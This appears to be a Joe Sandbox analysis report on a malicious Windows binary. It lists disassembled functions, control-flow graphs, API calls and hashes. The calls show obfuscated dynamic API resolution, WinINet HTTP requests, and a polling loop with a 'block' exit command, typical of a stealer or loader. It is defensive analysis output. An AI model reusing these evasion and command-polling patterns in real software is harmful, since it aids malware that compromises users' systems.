                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 40de54e9247eeb268ca78e379aa41790b77b76f546739a91ef02461f2e7839a3
                          • Instruction ID: d4f1becc251e072d91b1d5144a8750caf89519462a96471a1f7fb0265df49e6c
                          • Opcode Fuzzy Hash: 40de54e9247eeb268ca78e379aa41790b77b76f546739a91ef02461f2e7839a3
                          • Instruction Fuzzy Hash: D3D05E7490030CDFCB00DFE1D88D6EDBBB8FB08321F0409A5D90572340EA3155D9CAA6
                          Function 00C09C10 Relevance: 231.7, APIs: 112, Strings: 20, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 c09c10-c09c1a 634 c09c20-c0a031 GetProcAddress * 43 633->634 635 c0a036-c0a0ca LoadLibraryA * 8 633->635 634->635 636 c0a146-c0a14d 635->636 637 c0a0cc-c0a141 GetProcAddress * 5 635->637 638 c0a153-c0a211 GetProcAddress * 8 636->638 639 c0a216-c0a21d 636->639 637->636 638->639 640 c0a298-c0a29f 639->640 641 c0a21f-c0a293 GetProcAddress * 5 639->641 642 c0a2a5-c0a332 GetProcAddress * 6 640->642 643 c0a337-c0a33e 640->643 641->640 642->643 644 c0a344-c0a41a GetProcAddress * 9 643->644 645 c0a41f-c0a426 643->645 644->645 646 c0a4a2-c0a4a9 645->646 647 c0a428-c0a49d GetProcAddress * 5 645->647 648 c0a4ab-c0a4d7 GetProcAddress * 2 646->648 649 c0a4dc-c0a4e3 646->649 647->646 648->649 650 c0a515-c0a51c 649->650 651 c0a4e5-c0a510 GetProcAddress * 2 649->651 652 c0a612-c0a619 650->652 653 c0a522-c0a60d GetProcAddress * 10 650->653 651->650 654 c0a61b-c0a678 GetProcAddress * 4 652->654 655 c0a67d-c0a684 652->655 653->652 654->655 656 c0a686-c0a699 GetProcAddress 655->656 657 c0a69e-c0a6a5 655->657 656->657 658 c0a6a7-c0a703 GetProcAddress * 4 657->658 659 c0a708-c0a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(75900000,006D6940), ref: 00C09C2D
                          • GetProcAddress.KERNEL32(75900000,006D6800), ref: 00C09C45
                          • GetProcAddress.KERNEL32(75900000,006E8D00), ref: 00C09C5E
                          • GetProcAddress.KERNEL32(75900000,006E8C88), ref: 00C09C76
                          • GetProcAddress.KERNEL32(75900000,006EC8E8), ref: 00C09C8E
                          • GetProcAddress.KERNEL32(75900000,006EC8B8), ref: 00C09CA7
                          • GetProcAddress.KERNEL32(75900000,006DB298), ref: 00C09CBF
                          • GetProcAddress.KERNEL32(75900000,006EC918), ref: 00C09CD7
                          • GetProcAddress.KERNEL32(75900000,006EC990), ref: 00C09CF0
                          • GetProcAddress.KERNEL32(75900000,006EC840), ref: 00C09D08
                          • GetProcAddress.KERNEL32(75900000,006EC8A0), ref: 00C09D20
                          • GetProcAddress.KERNEL32(75900000,006D6820), ref: 00C09D39
                          • GetProcAddress.KERNEL32(75900000,006D6980), ref: 00C09D51
                          • GetProcAddress.KERNEL32(75900000,006D69A0), ref: 00C09D69
                          • GetProcAddress.KERNEL32(75900000,006D6860), ref: 00C09D82
                          • GetProcAddress.KERNEL32(75900000,006EC810), ref: 00C09D9A
                          • GetProcAddress.KERNEL32(75900000,006EC828), ref: 00C09DB2
                          • GetProcAddress.KERNEL32(75900000,006DB2C0), ref: 00C09DCB
                          • GetProcAddress.KERNEL32(75900000,006D6880), ref: 00C09DE3
                          • GetProcAddress.KERNEL32(75900000,006EC858), ref: 00C09DFB
                          • GetProcAddress.KERNEL32(75900000,006EC9D8), ref: 00C09E14
                          • GetProcAddress.KERNEL32(75900000,006EC8D0), ref: 00C09E2C
                          • GetProcAddress.KERNEL32(75900000,006ECAE0), ref: 00C09E44
                          • GetProcAddress.KERNEL32(75900000,006D68A0), ref: 00C09E5D
                          • GetProcAddress.KERNEL32(75900000,006ECA80), ref: 00C09E75
                          • GetProcAddress.KERNEL32(75900000,006EC9C0), ref: 00C09E8D
                          • GetProcAddress.KERNEL32(75900000,006ECA98), ref: 00C09EA6
                          • GetProcAddress.KERNEL32(75900000,006ECAC8), ref: 00C09EBE
                          • GetProcAddress.KERNEL32(75900000,006EC870), ref: 00C09ED6
                          • GetProcAddress.KERNEL32(75900000,006ECAF8), ref: 00C09EEF
                          • GetProcAddress.KERNEL32(75900000,006EC900), ref: 00C09F07
                          • GetProcAddress.KERNEL32(75900000,006EC888), ref: 00C09F1F
                          • GetProcAddress.KERNEL32(75900000,006EC930), ref: 00C09F38
                          • GetProcAddress.KERNEL32(75900000,006E9ED8), ref: 00C09F50
                          • GetProcAddress.KERNEL32(75900000,006EC948), ref: 00C09F68
                          • GetProcAddress.KERNEL32(75900000,006EC960), ref: 00C09F81
                          • GetProcAddress.KERNEL32(75900000,006D68E0), ref: 00C09F99
                          • GetProcAddress.KERNEL32(75900000,006EC978), ref: 00C09FB1
                          • GetProcAddress.KERNEL32(75900000,006D6900), ref: 00C09FCA
                          • GetProcAddress.KERNEL32(75900000,006EC9F0), ref: 00C09FE2
                          • GetProcAddress.KERNEL32(75900000,006EC9A8), ref: 00C09FFA
                          • GetProcAddress.KERNEL32(75900000,006D6480), ref: 00C0A013
                          • GetProcAddress.KERNEL32(75900000,006D6640), ref: 00C0A02B
                          • LoadLibraryA.KERNEL32(006ECA38,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A03D
                          • LoadLibraryA.KERNEL32(006ECA08,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A04E
                          • LoadLibraryA.KERNEL32(006ECA20,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A060
                          • LoadLibraryA.KERNEL32(006ECA50,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A072
                          • LoadLibraryA.KERNEL32(006ECA68,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A083
                          • LoadLibraryA.KERNEL32(006ECAB0,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A095
                          • LoadLibraryA.KERNEL32(006ECC30,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A0A7
                          • LoadLibraryA.KERNEL32(006ECD80,?,00C05CA3,00C10AEB,?,?,?,?,?,?,?,?,?,?,00C10AEA,00C10AE3), ref: 00C0A0B8
                          • GetProcAddress.KERNEL32(75FD0000,006D64E0), ref: 00C0A0DA
                          • GetProcAddress.KERNEL32(75FD0000,006ECD50), ref: 00C0A0F2
                          • GetProcAddress.KERNEL32(75FD0000,006E8900), ref: 00C0A10A
                          • GetProcAddress.KERNEL32(75FD0000,006ECC60), ref: 00C0A123
                          • GetProcAddress.KERNEL32(75FD0000,006D65C0), ref: 00C0A13B
                          • GetProcAddress.KERNEL32(734B0000,006DAF78), ref: 00C0A160
                          • GetProcAddress.KERNEL32(734B0000,006D6440), ref: 00C0A179
                          • GetProcAddress.KERNEL32(734B0000,006DB108), ref: 00C0A191
                          • GetProcAddress.KERNEL32(734B0000,006ECBB8), ref: 00C0A1A9
                          • GetProcAddress.KERNEL32(734B0000,006ECC78), ref: 00C0A1C2
                          • GetProcAddress.KERNEL32(734B0000,006D6500), ref: 00C0A1DA
                          • GetProcAddress.KERNEL32(734B0000,006D65E0), ref: 00C0A1F2
                          • GetProcAddress.KERNEL32(734B0000,006ECD08), ref: 00C0A20B
                          • GetProcAddress.KERNEL32(763B0000,006D63C0), ref: 00C0A22C
                          • GetProcAddress.KERNEL32(763B0000,006D62A0), ref: 00C0A244
                          • GetProcAddress.KERNEL32(763B0000,006ECD20), ref: 00C0A25D
                          • GetProcAddress.KERNEL32(763B0000,006ECBE8), ref: 00C0A275
                          • GetProcAddress.KERNEL32(763B0000,006D6400), ref: 00C0A28D
                          • GetProcAddress.KERNEL32(750F0000,006DB130), ref: 00C0A2B3
                          • GetProcAddress.KERNEL32(750F0000,006DB158), ref: 00C0A2CB
                          • GetProcAddress.KERNEL32(750F0000,006ECD68), ref: 00C0A2E3
                          • GetProcAddress.KERNEL32(750F0000,006D63E0), ref: 00C0A2FC
                          • GetProcAddress.KERNEL32(750F0000,006D6600), ref: 00C0A314
                          • GetProcAddress.KERNEL32(750F0000,006DAF00), ref: 00C0A32C
                          • GetProcAddress.KERNEL32(75A50000,006ECDC8), ref: 00C0A352
                          • GetProcAddress.KERNEL32(75A50000,006D6360), ref: 00C0A36A
                          • GetProcAddress.KERNEL32(75A50000,006E8890), ref: 00C0A382
                          • GetProcAddress.KERNEL32(75A50000,006ECCD8), ref: 00C0A39B
                          • GetProcAddress.KERNEL32(75A50000,006ECC00), ref: 00C0A3B3
                          • GetProcAddress.KERNEL32(75A50000,006D6660), ref: 00C0A3CB
                          • GetProcAddress.KERNEL32(75A50000,006D62C0), ref: 00C0A3E4
                          • GetProcAddress.KERNEL32(75A50000,006ECB40), ref: 00C0A3FC
                          • GetProcAddress.KERNEL32(75A50000,006ECDE0), ref: 00C0A414
                          • GetProcAddress.KERNEL32(75070000,006D64A0), ref: 00C0A436
                          • GetProcAddress.KERNEL32(75070000,006ECDF8), ref: 00C0A44E
                          • GetProcAddress.KERNEL32(75070000,006ECCC0), ref: 00C0A466
                          • GetProcAddress.KERNEL32(75070000,006ECC18), ref: 00C0A47F
                          • GetProcAddress.KERNEL32(75070000,006ECC90), ref: 00C0A497
                          • GetProcAddress.KERNEL32(74E50000,006D6540), ref: 00C0A4B8
                          • GetProcAddress.KERNEL32(74E50000,006D6280), ref: 00C0A4D1
                          • GetProcAddress.KERNEL32(75320000,006D6520), ref: 00C0A4F2
                          • GetProcAddress.KERNEL32(75320000,006ECC48), ref: 00C0A50A
                          • GetProcAddress.KERNEL32(6F060000,006D6420), ref: 00C0A530
                          • GetProcAddress.KERNEL32(6F060000,006D62E0), ref: 00C0A548
                          • GetProcAddress.KERNEL32(6F060000,006D64C0), ref: 00C0A560
                          • GetProcAddress.KERNEL32(6F060000,006ECCA8), ref: 00C0A579
                          • GetProcAddress.KERNEL32(6F060000,006D6560), ref: 00C0A591
                          • GetProcAddress.KERNEL32(6F060000,006D6620), ref: 00C0A5A9
                          • GetProcAddress.KERNEL32(6F060000,006D6580), ref: 00C0A5C2
                          • GetProcAddress.KERNEL32(6F060000,006D65A0), ref: 00C0A5DA
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00C0A5F1
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00C0A607
                          • GetProcAddress.KERNEL32(74E00000,006ECCF0), ref: 00C0A629
                          • GetProcAddress.KERNEL32(74E00000,006E89A0), ref: 00C0A641
                          • GetProcAddress.KERNEL32(74E00000,006ECD38), ref: 00C0A659
                          • GetProcAddress.KERNEL32(74E00000,006ECB70), ref: 00C0A672
                          • GetProcAddress.KERNEL32(74DF0000,006D6320), ref: 00C0A693
                          • GetProcAddress.KERNEL32(6F9C0000,006ECD98), ref: 00C0A6B4
                          • GetProcAddress.KERNEL32(6F9C0000,006D6300), ref: 00C0A6CD
                          • GetProcAddress.KERNEL32(6F9C0000,006ECB58), ref: 00C0A6E5
                          • GetProcAddress.KERNEL32(6F9C0000,006ECDB0), ref: 00C0A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: cm$ dm$ em$ fm$ hm$@dm$@em$@fm$@im$HttpQueryInfoA$InternetSetOptionA$`cm$`em$`fm$`hm$bm$cm$dm$em$hm
                          • API String ID: 2238633743-1644798973
                          • Opcode ID: f6892680b0faf3608246f927f02cca0ccabcc68fdc9d2276547215b6b78d7e60
                          • Instruction ID: 4260de1a7be1a010d2a46f859db0a162d503688ec9eb79447bbc12b3fe82915b
                          • Opcode Fuzzy Hash: f6892680b0faf3608246f927f02cca0ccabcc68fdc9d2276547215b6b78d7e60
                          • Instruction Fuzzy Hash: BD623BB5504208AFC348DFAAED8CD663FF9F79C30171C853AA685E3264D63994C9CB52
                          Function 00BF6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 bf6280-bf630b call c0a7a0 call bf47b0 call c0a740 InternetOpenA StrCmpCA 1040 bf630d 1033->1040 1041 bf6314-bf6318 1033->1041 1040->1041 1042 bf631e-bf6342 InternetConnectA 1041->1042 1043 bf6509-bf6525 call c0a7a0 call c0a800 * 2 1041->1043 1045 bf64ff-bf6503 InternetCloseHandle 1042->1045 1046 bf6348-bf634c 1042->1046 1062 bf6528-bf652d 1043->1062 1045->1043 1048 bf634e-bf6358 1046->1048 1049 bf635a 1046->1049 1051 bf6364-bf6392 HttpOpenRequestA 1048->1051 1049->1051 1053 bf6398-bf639c 1051->1053 1054 bf64f5-bf64f9 InternetCloseHandle 1051->1054 1056 bf639e-bf63bf InternetSetOptionA 1053->1056 1057 bf63c5-bf6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1058 bf642c-bf644b call c08940 1057->1058 1059 bf6407-bf6427 call c0a740 call c0a800 * 2 1057->1059 1067 bf644d-bf6454 1058->1067 1068 bf64c9-bf64e9 call c0a740 call c0a800 * 2 1058->1068 1059->1062 1071 bf64c7-bf64ef InternetCloseHandle 1067->1071 1072 bf6456-bf6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 bf648b 1072->1076 1077 bf6482-bf6489 1072->1077 1076->1071 1077->1076 1080 bf648d-bf64c5 call c0a9b0 call c0a8a0 call c0a800 1077->1080 1080->1072
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • InternetOpenA.WININET(00C10DFE,00000001,00000000,00000000,00000000), ref: 00BF62E1
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BF63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BF63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BF63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BF646D
                          • InternetCloseHandle.WININET(00000000), ref: 00BF64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00BF64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00BF6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: c52d1f6800e020add64b2555432b92ef5a8ecc277df77c22ab846aa43d90ae32
                          • Instruction ID: bf0e0217ac6dea45f02c3370fe1f09b48e48fc036e9305b835a3bc95b1b7bcf9
                          • Opcode Fuzzy Hash: c52d1f6800e020add64b2555432b92ef5a8ecc277df77c22ab846aa43d90ae32
                          • Instruction Fuzzy Hash: E0711D71A0021CABDB14EBA5DC49FEE77B8EB44700F1081A9F6096B1D0DBB46A89DF51
                          Function 00C05510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 c05510-c05577 call c05ad0 call c0a820 * 3 call c0a740 * 4 1106 c0557c-c05583 1090->1106 1107 c05585-c055b6 call c0a820 call c0a7a0 call bf1590 call c051f0 1106->1107 1108 c055d7-c0564c call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1106->1108 1124 c055bb-c055d2 call c0a8a0 call c0a800 1107->1124 1134 c05693-c056a9 call c0aad0 StrCmpCA 1108->1134 1137 c0564e-c0568e call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1108->1137 1124->1134 1140 c057dc-c05844 call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550 1134->1140 1141 c056af-c056b6 1134->1141 1137->1134 1272 c05ac3-c05ac6 1140->1272 1142 c057da-c0585f call c0aad0 StrCmpCA 1141->1142 1143 c056bc-c056c3 1141->1143 1161 c05991-c059f9 call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550 1142->1161 1162 c05865-c0586c 1142->1162 1146 c056c5-c05719 call c0a820 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1143->1146 1147 c0571e-c05793 call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1143->1147 1146->1142 1147->1142 1250 c05795-c057d5 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1147->1250 1161->1272 1167 c05872-c05879 1162->1167 1168 c0598f-c05a14 call c0aad0 StrCmpCA 1162->1168 1174 c058d3-c05948 call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1167->1174 1175 c0587b-c058ce call c0a820 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1167->1175 1197 c05a16-c05a21 Sleep 1168->1197 1198 c05a28-c05a91 call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550 1168->1198 1174->1168 1276 c0594a-c0598a call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1142 1276->1168
                          APIs
                            • Part of subcall function 00C0A820: lstrlen.KERNEL32(00BF4F05,?,?,00BF4F05,00C10DDE), ref: 00C0A82B
                            • Part of subcall function 00C0A820: lstrcpy.KERNEL32(00C10DDE,00000000), ref: 00C0A885
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C056A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05857
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00C051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05228
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05318
                            • Part of subcall function 00C052C0: lstrlen.KERNEL32(00000000), ref: 00C0532F
                            • Part of subcall function 00C052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C05364
                            • Part of subcall function 00C052C0: lstrlen.KERNEL32(00000000), ref: 00C05383
                            • Part of subcall function 00C052C0: lstrlen.KERNEL32(00000000), ref: 00C053AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C0578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00C05A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: c9b0fff6eb9ef69bf6c79c0f57dd1ad3183270f3436b611a609cf1e2b6ab13ab
                          • Instruction ID: 30f9a9c5b62778365e4299c258f0efd623f54377a6c5542c004d1522c3c22106
                          • Opcode Fuzzy Hash: c9b0fff6eb9ef69bf6c79c0f57dd1ad3183270f3436b611a609cf1e2b6ab13ab
                          • Instruction Fuzzy Hash: 75E15171910208ABCB14FBA5DC56EFE7778AF54300F50C668B506660D1EF346B4DEBA2
                          Function 00C017A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 c017a0-c017cd call c0aad0 StrCmpCA 1304 c017d7-c017f1 call c0aad0 1301->1304 1305 c017cf-c017d1 ExitProcess 1301->1305 1309 c017f4-c017f8 1304->1309 1310 c019c2-c019cd call c0a800 1309->1310 1311 c017fe-c01811 1309->1311 1312 c01817-c0181a 1311->1312 1313 c0199e-c019bd 1311->1313 1315 c01821-c01830 call c0a820 1312->1315 1316 c01849-c01858 call c0a820 1312->1316 1317 c018ad-c018be StrCmpCA 1312->1317 1318 c018cf-c018e0 StrCmpCA 1312->1318 1319 c0198f-c01999 call c0a820 1312->1319 1320 c01970-c01981 StrCmpCA 1312->1320 1321 c018f1-c01902 StrCmpCA 1312->1321 1322 c01951-c01962 StrCmpCA 1312->1322 1323 c01932-c01943 StrCmpCA 1312->1323 1324 c01913-c01924 StrCmpCA 1312->1324 1325 c01835-c01844 call c0a820 1312->1325 1326 c0185d-c0186e StrCmpCA 1312->1326 1327 c0187f-c01890 StrCmpCA 1312->1327 1313->1309 1315->1313 1316->1313 1342 c018c0-c018c3 1317->1342 1343 c018ca 1317->1343 1344 c018e2-c018e5 1318->1344 1345 c018ec 1318->1345 1319->1313 1332 c01983-c01986 1320->1332 1333 c0198d 1320->1333 1346 c01904-c01907 1321->1346 1347 c0190e 1321->1347 1329 c01964-c01967 1322->1329 1330 c0196e 1322->1330 1350 c01945-c01948 1323->1350 1351 c0194f 1323->1351 1348 c01930 1324->1348 1349 c01926-c01929 1324->1349 1325->1313 1338 c01870-c01873 1326->1338 1339 c0187a 1326->1339 1340 c01892-c0189c 1327->1340 1341 c0189e-c018a1 1327->1341 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 c018a8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1313 1349->1348 1350->1351 1351->1313 1355->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00C017C5
                          • ExitProcess.KERNEL32 ref: 00C017D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
